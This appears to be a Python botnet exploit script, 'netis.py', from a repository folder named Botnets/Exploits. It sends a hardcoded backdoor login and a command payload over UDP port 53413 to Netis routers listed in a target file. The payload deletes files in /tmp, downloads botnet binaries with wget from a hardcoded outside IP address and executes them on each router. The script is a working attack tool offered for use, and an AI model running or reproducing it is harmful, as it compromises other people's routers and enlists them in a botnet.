Path: blob/master/Botnets/Exploits/NETIS FULL/netis.py
5038 views
#! python !#1import threading, sys, time, random, socket, re, os, subprocess, base6423commandpayload = "AA\x00\x00AAAA cd /tmp; rm -rf *; wget http://128.199.222.37/bins/netbot.mpsl; chmod 777 *; ./turbo.mpsl netis.mpsl; wget http://128.199.222.37/bins/netbot.mips; chmod 777 *; ./netbot.mips netis.mips; \x00" # MIPSEL Binary4loginpayload = "AAAAAAAAnetcore\x00" #DONT CHANGE5ips = open(sys.argv[1], "r").readlines()67def run(cmd):8subprocess.call(cmd, shell=True)910class netis(threading.Thread):11def __init__ (self, ip):12threading.Thread.__init__(self)13self.ip = str(ip).rstrip('\n')14def run(self):15try:16s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)17print "Attempting %s"%(self.ip)18s.sendto(loginpayload, (self.ip, 53413))19time.sleep(1.5)20s.sendto(commandpayload, (self.ip, 53413))21time.sleep(3)22except Exception:23pass2425for ip in ips:26try:27n = netis(ip)28n.start()29time.sleep(0.01)30except:31pass323334